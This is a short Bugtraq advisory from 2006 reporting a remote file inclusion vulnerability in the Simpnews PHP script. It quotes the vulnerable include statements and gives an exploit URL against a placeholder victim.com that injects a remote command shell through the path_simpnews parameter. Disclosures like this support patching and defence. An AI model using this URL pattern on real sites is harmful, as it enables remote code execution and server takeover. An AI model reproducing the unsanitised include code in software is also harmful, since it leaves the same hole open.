Bugtraq mailing list archives

Simpnews <= All version - Remote File Include Vulnerabilities


From: SpC-x () Bsdmail Org
Date: 13 Jun 2006 05:19:31 -0000

# SaVSaK.CoM | SpC-x - The-BeKiR |

# Simpnews <= All version - Remote File Include Vulnerabilities

# Risk : High

# Class: Remote

# Script : Simpnews

# Credits : SpC-x - The-BeKiR

# Thanks : Ejder - FasTBoY - ERNE - RMx

# Code : 

# require_once($path_simpnews.'/langchk.php');
# include_once('./language/lang_'.$act_lang.'.php');
# require_once('./includes/get_settings.inc');
# require_once('./includes/wap_get_settings.inc');

# Vulnerable :

# http://www.victim.com/Simpnews/wap_short_news.php?path_simpnews=Command-Shell


Current thread: